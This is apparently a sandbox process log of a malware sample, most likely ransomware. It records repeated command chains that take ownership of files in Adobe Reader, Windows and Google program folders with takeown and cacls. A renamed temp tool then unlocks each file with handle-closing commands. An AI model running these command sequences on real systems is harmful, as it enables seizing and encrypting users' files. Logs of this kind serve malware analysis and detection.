C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "server_ok.gif" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "server_ok.gif" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1404
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵
- Modifies file permissions
PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵
- Modifies file permissions
PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "brt.hyp" -nobanner3⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "brt.hyp" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:1416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "can32.clx" -nobanner3⤵PID:380
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "can32.clx" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:1096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵
- Modifies file permissions
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:300
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:1860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:1096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵PID:1840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1404
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"3⤵
- Modifies file permissions
PID:1936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Genko_2.jtp" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Genko_2.jtp" -nobanner4⤵PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
PID:944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "wab.exe" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "wab.exe" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "RTC.der" -nobanner3⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "RTC.der" -nobanner4⤵PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:300
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:1780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:1772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "main.css" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "main.css" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "review_email.gif" -nobanner3⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "review_email.gif" -nobanner4⤵PID:1404
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "submission_history.gif" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "submission_history.gif" -nobanner4⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:1260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "warning.gif" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "warning.gif" -nobanner4⤵PID:944
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:1892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:228
-
-
